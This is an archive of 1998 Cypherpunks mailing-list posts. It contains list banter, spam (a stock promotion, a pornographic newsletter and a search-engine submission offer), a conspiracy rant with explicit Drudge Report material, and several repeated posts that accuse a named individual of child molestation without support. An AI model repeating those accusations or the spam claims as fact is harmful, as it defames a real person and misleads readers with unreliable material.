From: "Marc Maffei" <marcmf@2xtreme.net>
Date: Fri, 21 Aug 1998 22:25:08 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re:
Message-ID: <00cf01bdcd8a$a07efe20$8e2193d0@marcmaff>
MIME-Version: 1.0
Content-Type: text/plain


Man has anybody noticed how many of these @#%#$^^&*& there seem to be, I
always wonder if they are as dumb as they seem to be or do the cops think we
are as dumb as they seem to be?
Not to say that this one is a cop playing robber but, really........  {:-()
-----Original Message-----
From: Xcott Craver <caj@math.niu.edu>
To: cypherpunks@toad.com <cypherpunks@toad.com>
Date: Tuesday, August 18, 1998 7:42 PM


>On Wed, 19 Aug 1998, paolo wrote:
>
>> Sorry I'm not very expert about invading systems but I need your help to
>> enter in a bank.
>
> [...]
>
>> Can you help me to find any good italian hackers?
>
> Now that you've declared your intent to the whole world,
> I'd recommend instead that you find a good Italian hacksaw.
>
> I have a lovely focaccia recipe, if you need something
> to bake it into.
>
> -Caj
>
> Not to piss off those world-famous Italian hackers or anything.
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: biz43@athene.stat.uni-muenchen.de
Date: Fri, 21 Aug 1998 19:53:45 -0700 (PDT)
To: Friend@public.com
Subject: Need 7 PROFESSIONAL - NOW!!! - 100% commission
Message-ID: <199808220252.TAA12263@toad.com>
MIME-Version: 1.0
Content-Type: text/plain





 Dear Entrepreneurial  Friend,

Please forgive the intrusion but I saw your WebSite.

Nice Job.

If you have been contemplating a method by which 
you can add SUBSTANTIAL cash flow to your existing
project while you work at getting it off the ground,
then you'll want to see what InfoDisk can offer you.

Please stop by our WebSite and examine the concept
of "Default Compensation."

The fastest, most lucrative Cash-Flow "system" in 
existence today.

IT'S ALL INSTANT, AND IT'S ALL YOURS - 100% !!!

Please go immediately to:

                  <http://www.profitcountry.com/index.html>


Good luck and much success to 
you and your loved ones.

Sincerely,

Butch & Sandy : )


(This message is sent to you pursuant to a strict code of ethics.
Even still, should you feel inconvenienced you can 
remove yourself by sending an email to:

            <purge@profitcountry.com> 

Put "remove" in the subject line, all else is ignored.)




***end***










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Fri, 21 Aug 1998 16:31:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: anarchy cookbook
Message-ID: <744f93e6650777c6d8629e2262b4ce29@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Aug 1998 Spazherp@aol.com wrote:

> 
> Is any one home?
> 
> 

Our tests have determined that you are severely lacking in the clue
department. As per the advice of "Porker" <PTPPork@aol.com>, you are
advised to upgrade to 32-bit AOL immediately. We have been advised that
upgrading to 32-bit AOL fixes problems with cluelessness. 

Remember: with the Advent of 32 bit AOL, you can actually use all of the
TCP/IP protocols.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: san@sergey.stud.pu.ru (Sergey A. Nikolaenko)
Date: Fri, 21 Aug 1998 12:50:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Need your help !!!
Message-ID: <AJI0Ttr8cD@sergey.stud.pu.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hello everybody ,

My name is Sergey. I'm new here and I need your help ...
I'm very interested in cryptography and I just don't know
what should I know for the first and where I can find a papers
about cryptography . My problem is that I haven't on-line
access to the Web I have only e-mail therefore many things
are not possible for me ( or not ? ) It will be very pleasant
for me if someone can help me ...

Thank you very much ,
Sergey.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RAGOD5597@aol.com
Date: Fri, 21 Aug 1998 20:57:20 -0700 (PDT)
To: cypherpunks-unedited@toad.com
Subject: Ragod5597@aol.com
Message-ID: <83ceca8e.35de4179@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tell me how to get tons of free stuff!  Thank You .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Fri, 21 Aug 1998 22:26:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Announcing:  WWW Cryptography Article Database
Message-ID: <4.0.1.19980817163823.00e564a0@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


Announcing:  WWW CRYPTOGRAPHY ARTICLE DATABASE

Counterpane Systems
http://www.counterpane.com/biblio/

Counterpane Systems has created an extensive bibliography of links to 
cryptography papers available on the World Wide Web.  We hope to 
build a comprehensive database of published papers available on the 
net, organized both by author and by year.

Users can view the bibliography by author (every author is indexed, not 
just the first author) or by publication year.  There will also be a single 
page containing all the citations, to facilitate searching the full bibliography 
(by keyword, for example) with your browser's search function.

Counterpane wants this database to be a research tool for the community, 
and for it to be continuously updated.  We will frequently monitor the 
WWW for new articles for our database.  Researchers can also submit 
articles for inclusion in the database using an on-line form; see the 
webpage for details.

Please help.  If you have papers on the Web, please submit them into 
our database.  If you know of any archives of papers that I missed, 
please let me know.  If there are any features you'd like to see, please 
suggest them.

Future enhancements include grouping of papers by subject, the 
inclusion of searchable paper summaries, and the ability to comment on 
research papers.  We hope to also broaden the scope of the database 
to computer security in general.

Please take a moment to try out the Counterpane Cryptography Article 
Database, and let us know what you think.


Thank you,
Bruce Schneier 

**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 21 Aug 1998 16:16:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Pipe
Message-ID: <199808212317.BAA24901@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 20 Aug 1998 FTPPork@aol.com wrote:

> << Hoppyhead,
>  
>  You'll have to wait until we supply the other AOLholes with the information
>  they demanded on thrash music, hacking banks info, LSD manufacturing, and
>  get rich quick schemes.
>  
>  We're struggling under the workload of millions of new AOL, PacBell,
>  Earthlink, Prodigy, and other newbies who have just discovered the Net.
>  
>  
>  --Tim May
>   >>
> I take that statement as an insult, and it really isn't true about all of us
> AOL users.  Of course, Hoppy was kinda stupid for asking something that
> stupid, but we don't all care about thrash music, hacking banks info, LSD
> manufacturing, and
>  get rich quick schemes.  Actually, some of us know what real hacking is...
> not just using scrolling programs and cracking banks (Both of which are
> completely different) etc...
> 
> Anyway, try not to stereotype people so much, because, with the Advent of 32
> bit AOL, we can actually use all of the TCP/IP protocols, etc...

[Porker's lame quoting style retained.]

Porker,

So use an ISP which doesn't have the horrible reputation that AOL and its
users have earned. You continue the grand AOL tradition of spreading
lameness throughout the Internet. 

Because AOL is now "32 bit" (oh brother) AOL users are suddenly not
idiots. Right. I guess all the AOLholes who were posting requests for LSD
manufacturing, hacking banks, and band stickers were using "16 bit AOL." 

The number of bits AOL's software uses has nothing to do with it. AOL gets
ragged on because their (publishing to the Internet) userbase is composed
mostly of total morons and because they go try to sign up every idiot they
can find with a "50 hours free stupidity/spamming fest" disk. Their
software is designed to allow a trained chimp to use the Internet, and -
surprise, surprise - that's what we get most of the time.

Of course not *all* AOL users are idiots, but enough are to make the
stereotype valid.

If AOLers want to stop being made fun of, then get AOL to stop catering to
every moron they can find and saying "AOL is the Internet." Stop using
this lame and annoying "<< >>" quoting style. (Before somebody jumps on
that, there have been at least four or five Cypherpunks who have
publically bitched about it here and other people have complained about it
elsewhere.) Stop posting requests for music, band stickers, books, pipe
bombs, hacking info, and other such junk to mailing lists where it's
inappropriate and to inappropriate USENET newsgroups. At least try to put
some effort into formatting your posts so that they don't have line breaks
in bizarre places, don't underuse or overuse punctuation, and try to use
some proper capitalization.

AOL brought this on themselves. At least they send me free coasters and
mirrors every other week. 

If it wasn't for the very rare useful post from AOL, I'd have my system
killfile mail from AOL going to the Cypherpunks list like I do for my
normal inbox. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jenny5430@usa.net
Date: Sat, 22 Aug 1998 01:53:17 -0700 (PDT)
To: jenny5430@usa.net
Subject: Awesome!
Message-ID: <199808220852.BAA25061@ari.com>
MIME-Version: 1.0
Content-Type: text/plain



-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
                                                             Omicron Technologies Inc.
                                                 NASD OTC B/B Trading Symbol: OGPS

                        On August 4, 1998, Omicron Technologies, Inc. Signed a Memorandum of Intent to
                  acquire a 40% interest for a revolutionary new technology called Active Pixel Sensors (APS).

                                This cutting edge imaging technology holds great promise to revolutionize
                                  the way camcorders and other digital cameras are produced. APS is a
                            "Camera-On-A-Chip with advantages of ... miniaturization ... ruggedness ... 10
                                times lower production costs... and 100 times lower power consumption.

                                                  Omicron opened at $2.50 on July 24, 1998

 
                                                          This Friday, August 21, 1998
                                                             Omicron closed at $6.25

                                                  The stock is up 250% in less than 30 days.
  
                                     For more information: http://www.omicrontechnologies.com/
                                                                   Stock Symbol: OGPS

                                                                  ______________________
                       This is a one time only mailing. However, if you would like to be removed from the list,
                  simply reply with "remove" in the subject line and accept our apologies for any inconvenience.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Wenzler <rwenzler@usachoice.com>
Date: Sat, 22 Aug 1998 02:56:03 -0700 (PDT)
To: RAGOD5597@aol.com
Subject: Re: Ragod5597@aol.com
In-Reply-To: <83ceca8e.35de4179@aol.com>
Message-ID: <35DE962C.58D5CAE1@usachoice.com>
MIME-Version: 1.0
Content-Type: text/plain


RAGOD5597@aol.com wrote:
> 
> Tell me how to get tons of free stuff!  Thank You .

Go to a search engine or directory. Type in the word 'freebies'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: srchzEngzz@hostmaker.com
Date: Fri, 21 Aug 1998 22:55:10 -0700 (PDT)
To: srchzEngzz@hostmaker.com
Subject: 700 Search Engines-$39
Message-ID: <199808220555.WAA13487@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


___________________________________________________________
!!! 700 SEARCH ENGINES                               25M3

HOME PAGE OR BUSINESS SITE!!!!!!!!*************

HURRY...THIS SPECIAL PRICE WON'T LAST LONG!!!!!  

ONLY $39

(WE HAVE TAKEN THE WORRY OUT OF INTERNET TRANSACTIONS
---SEE BELOW)


Thats right, this is not a mistake, we will submit your Website to 700 search
engines and directories for $39.


Just print out the form below and fax it us us for immediate processing. (Do not
reply via e-mail)

Name:

Name of Company:

Address:

Site URL: http://


E-mail Address:

Title of site: (25 words or less)



Description of site: (50 words or less)




Keywords: (6 total, most important first)


Phone Number:


Payment can be made by faxing a copy of your check to 714 768-3650 payable to: K.L.E.N.T. (we will
import the information from your check into our check processing software for
deposit into our bank, no need to mail check).

Or, you can pay by credit card, just fill out information and fax your info
to us and we will contact you and give you our secure URL for credit
card transactions...DO NOT INCLUDE CREDIT CARD INFO ON THIS FORM!!

If you wish information, please fax this form with your phone number that you can
be reached and one of our agents will contact you..

Worry free transaction---upon receipt of your faxed check (make out to K.L.E.N.T. ) we will submit your
site within 48 hours...it takes anywhere from 5-10 days for your faxed check to clear
your bank.  If we do not do as we say, you would have plenty of time to stop
payment on your check.  Now,  we are in the position of trusting you, as we have
already done the work and your check has not even been paid...sorry to say that we
do on occasion get a NSF check, however there are many more people that are
honorable and do not stick us with a NSF check after we have done the work. 

Credit card holders are always protected against non-delivery of product or service
through the credit card companys, now we protect our customers that pay by check
as well...I don't think you will find many companys that will do what we are doing
in order to protect the consumer.. 

We have been in business for about 3years dealing on the internet and know how
frustrating it can be dealing with someone you don't even know.   I hope that our
offer creates the validity needed in order to provide you with the service that we
provide our customers.

Ken                                                                                                    25M3

K.L.E.N.T.

P.S. Reservations will only be accepted with paid orders......Thank You!
Please fax a copy of your check along with the above form....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sat, 22 Aug 1998 01:36:31 -0700 (PDT)
To: (STUFFED SATURDAY AUGUST 22 1998)
Subject: Babes, babes and more babes/Now stuffed has 8 centerfolds per day!
Message-ID: <19980822071000.25735.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ EIGHT GORGEOUS CENTERFOLD GIRLS DISPLAYING ALL THEIR NAKED BEAUTY
+ Frederick's of Alcatraz: Hand-me-down panties
+ Kenneth Starr given the 1998 Boobie Award at World Pornography Conf.
+ Dress for Succ-Sex: How to dress to bed that girl
+ Masturbaker: His secret ingredient uncovered
+ Women are Easy part 11: Where to find the women you desire (part II)
+ Give that man a cigar: Celebrating pop makes friends' faces pop
+ Nudist car sale: Not stripped down autos, but close...
+ Guru teaches how to give yourself a blow job
+ Britain's oldest transvestite comes out of the closet
+ Today's Sexy Story: Having fun with food

       ---->   http://stuffed.net/98/8/22/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/22/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sat, 22 Aug 1998 01:06:52 -0700 (PDT)
To: cypherpunks-unedited@toad.com
Subject: Re: Ragod5597@aol.com
Message-ID: <fec4b059dd6a83395ade1ff2946f1180@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Aug 1998 RAGOD5597@aol.com wrote:

> 
> Tell me how to get tons of free stuff!  Thank You .
> 
> 

Thank you for asking, R /\ D G /\ \/\/ D!

The best way to obtain tons of free stuff is called the "smash and grab"
technique. It needs to be modified, however. First, not many people know
that the police will actually help you load this free stuff into your
rented moving truck if you only call and ask. Make sure you tell them
exactly where you will be and exactly what time you'll be there, or they
won't be able to help! 

The police are really busy people, though, so you need to make their job
as easy as possible. A few minutes before they get there, break the front
window of the store and begin loading stuff yourself. 

This works! Really! I swear!

Oh, you should upgrade to 32-bit AOL as soon as possible. Reports indicate
that it increases AOLers' I.Q. points to an acceptable level. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 22 Aug 1998 11:24:04 -0700 (PDT)
To: "Jean-Francois Avon" <cypherpunks@toad.com>
Subject: Re: NSA and Industry Deal
In-Reply-To: <199808221722.NAA06704@cti06.citenet.net>
Message-ID: <v0313030bb204bc71b581@[209.133.20.44]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM -0700 8/22/98, Jean-Francois Avon wrote:

Apparently in his .sig, as it's been repeated more than once:

>Definition:  FACISM: n.:  a political and economic movement, strongly
>nationalistic, magnifying the rights of the state as opposed to those of
>the

"Fascism."

Normally I don't correct spelling errors (esp. as we all make them, whether
due to mistyping, bad editing, inattention, or simple ignorance of the
correct spelling), but spelling errors in .sigs ought to be corrected.

Best wiches,

--Tim


"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FTPPork@aol.com
Date: Sat, 22 Aug 1998 08:33:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: anarchy cookbook
Message-ID: <fcf2b95a.35dee465@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I did not say anywhere that 32 bit would fix problems of cluelessness - or
ignorance in your case.  I said, it is a little better because we can now use
TCP/IP protocols.  Did I ever say that the people on AOL were smarter because
of it?  Well, let's go read over that post - - - nope... I didn't.  I think
some people should read a little more carefully, or just don't read at all.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FTPPork@aol.com
Date: Sat, 22 Aug 1998 08:33:27 -0700 (PDT)
To: cypherpunks-unedited@toad.com
Subject: Re: Ragod5597@aol.com
Message-ID: <faf5deba.35dee497@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Here we go again




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fryday1@nightmail.com
Date: Sat, 22 Aug 1998 12:37:32 -0700 (PDT)
To: aaa-list@lists.netlink.co.uk
Subject: Research...
Message-ID: <199808221937.MAA31509@mail2.nightmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi everyone!
    Hey, I am doing a computer science research project on IPv6 security, but
right now I am thinking of ending this research with my school and conducting
it independently.  As for my school research I am seriously thinking about
cryptography, so I just wanted to know if you had any suggestions on good
projects or research papers on cryptography or computer security in general,
wherever it might lead to.  Theres so much out there that I want to work on
and I can only take so much with me, and I just want to make sure that I have
seen all my choices before I start a 2+year research project....  Thanx again
for your time!

         Fryday-1


Send flames to: SteveCase@aol.com
                        CEO and Founder of AOL Inc.

______________________________________________________
Get Your Free, Private Email at http://www.nightmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: guyinmd@hotmail.com
Date: Sat, 22 Aug 1998 10:16:41 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808221716.NAA22164@beast.toad.net>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: guyinmd@hotmail.com
Date: Sat, 22 Aug 1998 10:17:08 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808221717.NAA22204@beast.toad.net>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 22 Aug 1998 10:20:57 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: NSA and Industry Deal
Message-ID: <199808221722.NAA06704@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 22 Aug 1998 17:14:03 +0200, Anonymous wrote:

>> saying it has perhaps created an improper relationship 
>> between the secretive NSA and a select group of contractors.
>
>I did not have sexual relations with that woman.
>

HHHA!  Some investigators crack DNA code like most peoples crack open a box of 
Rice Krispies; Snap, Pop and Crack!





Definition:  FACISM: n.:  a political and economic movement, strongly nationalistic, magnifying the rights of the state as opposed to those of the individual, in which industry, though remaining largely under private ownership, and all administrative
political units, are controlled by a strong central government.
        -------------------------------------------------
"One of the ordinary modes by which tyrants accomplish their purpose, without resistance, is by disarming the people and making it an offense to keep arms".  - Joseph Story, U.S. Supreme Court Justice.
        -------------------------------------------------
the German gun control laws were enacted by the "liberal" Weimar Republic government that preceded Hitler, and were a strong aid to his coming to power -- because they disarmed Hitler's opponents, and Hitler's adherents ignored them -- as criminals have always ignored gun control laws.

Disarming the public is a frequent first step toward dictatorships and genocides.  Once the disarming is complete, the public is helpless against those who have the guns.        -------------------------------------------------

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 22 Aug 1998 08:13:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: NSA and Industry Deal
In-Reply-To: <199808211954.PAA00582@camel7.mindspring.com>
Message-ID: <199808221514.RAA15384@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


> saying it has perhaps created an improper relationship 
> between the secretive NSA and a select group of contractors.

I did not have sexual relations with that woman.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bizemail@TheOffice.net
Date: Sat, 22 Aug 1998 16:11:29 -0700 (PDT)
To: bizemail@TheOffice.net
Subject: ADV: Oportunidad Unica en la Vida
Message-ID: <199808222305.SAA08986@hermes.uninet.net.mx>
MIME-Version: 1.0
Content-Type: text/plain


//////////////////////////////////////////////////////////////////////////////////
Este mensaje cumple con los requerimientos de la leyes Federales
para el Correo Electronico Comercial, Seccion 301.

Para informacion adicional vea: 
http://www.senate.gov/%7Emurkowski/commercialemail/EMailAmendOutline.html 

Informacion Requerida del Remitente:

Alberto Martinez 
Av. San Jeronimo 273, local 21-120
Tizapan Pedregal de San Angel
01908 Mexico, D. F., Mexico
Radio: (5) 447 11 11  pin 5550957 

De acuerdo a la Seccion 301, Parrafo (a)(2)(C) de  S. 1618, 
Trasmisiones posteriores hacia usted por el remitente de este
Email pueden ser suspendidas SIN COSTO para usted contestando
a esta direccion de Email con la palabra "remove" en la linea del
subject/asunto. 
//////////////////////////////////////////////////////////////////////////////// 


 APRENDA COMO GANAR DINERO POR INTERNET !

             http://www.miller.com.mx/biz.html








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jemic@earthlink.net
Date: Sat, 22 Aug 1998 19:16:50 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808230216.TAA21644@gull.prod.itd.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/4.05 [en]C-DIAL  (Win95; U)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "joseph f. brehm" <josfbrehm@sparknet.net>
Date: Sat, 22 Aug 1998 18:47:49 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <35DF90B5.582A@sparknet.net>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/2.01 (Win16; I)
Remedy=Tell the world





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 22 Aug 1998 04:19:08 -0700 (PDT)
To: cypherpunks-unedited@toad.com
Subject: Re: Ragod5597@aol.com
In-Reply-To: <83ceca8e.35de4179@aol.com>
Message-ID: <3.0.5.32.19980822211903.008f2760@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 PM 8/21/98 EDT, RAGOD5597@aol.com wrote:
>Tell me how to get tons of free stuff!  Thank You .
>
>

FIRST, you need to,,, well, you already did that.
you should be reaping the benefits of everything free,,, already,,,

enjoy!!!


	"Nothing is impossible for the man who doesn't have to do it 
	himself." 
						--Weiler's Law




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Sat, 22 Aug 1998 16:29:43 -0700 (PDT)
To: John Young <cypherpunks@toad.com>
Subject: conspiracy of bombed and bombers --add Monica's cigar.
Message-ID: <Pine.BSF.3.96.980822232501.995M-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



   now, we all know that government is a business which needs the
   support of the people.  is a terrorist organization any 
   different? both need the hearts and heartbeats of their "subjects".

   given Bubba's need for a little war to satisfy his carnal love
   of sex and control, he calls bin Laden and tells him: "Lay one on me,
   Buddy! They're closing in on me because of this wench Monica". 

   so, bin Laden bombs a couple embassies and digs a few new bomb 
   shelters in the forbidden hills of Afghanistan...

   good business relationship. bin Laden gets the U.S. people psyched
   up and willing to give up more of their rights and freedoms to Bubba;
   and bin Laden gets loved by even more of the Arab populations who are
   just goat droppings to their despotic governments but who send their
   gold and young martyrs-to-be to him.

   "The plan worked like a charm, Buddy!" 

   "No camel dung, Bubba! let me know when you want to remodel some more 
    embassies!"

   "OK, Buddy, next time I'll send you a Monica scented cigar!"

   What's Monica got to do with the conspiracy? thought you'd never ask: 
   about an hour ago Matt Drudge laid this one on the net (this one will 
   cost six embassies, not just two):

DRUDGE REPORT
By Matt Drudge
Sat Aug 22 1998 14:22:02 ET

MEDIA STRUGGLES WITH SHOCKING NEW DETAILS OF WHITE HOUSE AFFAIR

**Warning: Contains Graphic Description

In a bizarre daytime sex session, that occurred just off the
Oval Office in the White House, President Clinton watched as intern Monica
Lewinsky reportedly masturbated with his cigar.

It has been learned that several major news organizations have
confirmed the shocking episode and are now struggling to find ways to report
the full Monica Lewinsky/Bill Clinton grossout.

Media Bigfeet are trying to reconstruct one sex session that
reportedly took place as Yasser Arafat waited in the Rose Garden for his
scheduled meeting with the president!

According to multiple sources close to the case, President Clinton
allegedly masturbated as Lewinsky performed the sex show with his cigar
in a small room off the Oval Office. It is not clear if Clinton or Lewinsky
kept the cigar, or if Lewinsky testified on the specifics of the encounter
before a federal grand jury this week. Lewinsky's testimony has been described
as graphic, and included unusual practices.

The DRUDGE REPORT has now been briefed on these shocking details
that have stunned all those who have heard them and investigated them --
details that now threaten to completely disgust and stun the American electorate.

The White House refuses to comment on any DRUDGE REPORT

   

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Sat, 22 Aug 1998 22:37:58 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: GPS used to monitor commercial drivers (fwd)
Message-ID: <Pine.BSF.3.96.980823053517.8631B-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



    so, how long before they add the device to our cars?

DEPARTMENT OF TRANSPORTATION
Federal Highway Administration
49 CFR Part 395
Global Positioning System (GPS) Technology
AGENCY: Federal Highway Administration (FHWA), DOT.
ACTION: Notice of interpretation; request for participation
in pilot demonstration project.
-----------------------------------------------------------------------
SUMMARY: The FHWA believes global positioning system (GPS) technology
and many of the complementary safety management computer systems
currently being used by the motor carrier industry, provide at least
the same degree of monitoring accuracy as the ``automatic on-board
recorders'' allowed by the Federal Motor Carrier Safety Regulations
(FMCSRs), 49 CFR 395.15. Accordingly, the FHWA is announcing a
voluntary program under which a motor carrier with GPS technology and
related safety management computer systems may enter into an agreement
with the FHWA to use such systems in a pilot demonstration project to
record and monitor drivers' hours of service in lieu of complying with
the handwritten ``records of duty status'' requirement of the FMCSRs,
49 CFR 395.8. Consistent with the President's initiatives in
reinventing government and regulatory reform, the project is intended
to demonstrate whether the motor carrier industry can use the
technology to improve compliance with the hours-of-service requirements
in a manner which promotes safety and operational efficiency while
reducing paperwork requirements.

<snip>

Background

    On September 30, 1988, the FHWA published a final rule (53 FR
38666) {interesting number?} to allow motor carriers, at their option,
to use certain automatic on-board recording devices to record their
drivers' records of duty status in lieu of the required handwritten
records of duty status. This provision is now codified at 49 CFR
395.15. Many motor carriers that employed that technology found that
their compliance with the hours-of-service regulations improved. New
technologies are emerging, however, and the narrowly crafted on-board
recorder provision is becoming obsolete.

<snip>

    The FHWA is aware of the benefits of GPS technology to monitor and
control drivers' compliance with the hours-of-service regulations.

<snip>

    Premise: Section 395.2 of the FMCSRs defines an ``automatic
on- board recording device'' as ``an electric, electronic,
electromechanical, or mechanical device capable of recording driver's
duty status information accurately and automatically as required by
Sec. 395.15. The device must be integrally synchronized with specific
operations of the commercial motor vehicle in which it is installed. At
a minimum, the device must record engine use, road speed, miles driven,
the date, and time of day.'' Section 395.15 of the FMCSRs provides
motor carriers the authority to use ``automatic on-board recording
devices'' to record their drivers' hours-of-service in lieu of
complying with the handwritten record of duty status requirements
of Sec. 395.8.

<snip>

Issued on: March 25, 1998.
Gloria J. Jeff,
Deputy Federal Highway Administrator.
[FR Doc. 98-8882 Filed 4-3-98]

-----------------------------------------
[Federal Register: April 6, 1998 (Volume 63, Number 65)]
[Rules and Regulations]  [Page 16697-16699]
>From the Federal Register Online via GPO Access
[wais.access.gpo.gov]
[DOCID:fr06ap98-15]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: advocate <advocate@rocketmail.com>
Date: Sun, 23 Aug 1998 08:17:26 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808231517.LAA23121@fh102.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

